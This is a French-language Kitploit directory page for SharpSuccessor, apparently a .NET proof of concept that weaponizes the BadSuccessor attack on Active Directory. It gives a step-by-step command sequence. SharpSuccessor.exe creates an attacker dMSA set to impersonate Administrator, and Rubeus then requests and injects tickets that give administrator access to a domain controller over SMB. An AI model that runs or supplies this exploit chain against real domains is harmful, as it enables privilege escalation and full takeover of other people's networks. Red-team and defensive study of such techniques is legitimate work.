Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
SharpSuccessor — SharpSuccessor is a .NET Proof of Concept (POC) for fully weaponizing Yuval Gordon’s (@YuG0rd) BadSuccessor attack from Akamai. | Kitploit
Outils/GitHubGitHub/logangoins/sharpsuccessor
Privilege EscalationExploitationPost-ExploitationPenetration TestingIdentity & Access Management (IAM)AuthenticationRed Teaming
GitHublogangoins/sharpsuccessor

SharpSuccessor

SharpSuccessor is a .NET Proof of Concept (POC) for fully weaponizing Yuval Gordon’s (@YuG0rd) BadSuccessor attack from Akamai.

Voir le dépôt
42170il y a 10 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

SharpSuccessor

SharpSuccessor est une preuve de concept (POC) .NET pour armer complètement l'attaque BadSuccessor de Yuval Gordon (@YuG0rd) publiée par Akamai. Un utilisateur à faibles privilèges disposant des permissions CreateChild sur n'importe quelle unité d'organisation (OU) du domaine Active Directory et d'un accès en écriture sur un objet cible peut effectuer une prise de contrôle de compte.

Utilisez SharpSuccessor pour ajouter et armer l'objet dMSA, ainsi que pour écrire les attributs appropriés sur le compte cible que vous souhaitez usurper :

root@kitploit:~
SharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA

image

Demandez un TGT dans le contexte de l'utilisateur actuel, en l'occurrence jdoe :

root@kitploit:~
Rubeus.exe tgtdeleg /nowrap

image

Utilisez ensuite ce tgt pour usurper le compte dMSA :

root@kitploit:~
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIFTDCCB.....

image

Vous pouvez maintenant demander un ticket de service avec le contexte Administrateur pour n'importe quel SPN, y compris les contrôleurs de domaine, pour la post-exploitation. Par exemple, je vais montrer les privilèges administrateur pour SMB sur le contrôleur de domaine :

root@kitploit:~
Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF2DCCBdS...

image

Maintenant que le ticket est en mémoire, nous pouvons tester l'accès :

image

Assistance et inspirations

Un immense merci à Jim Sykora et Garrett Foster pour les inspirations et l'aide apportées pour cet outil !

Télécharger l’outil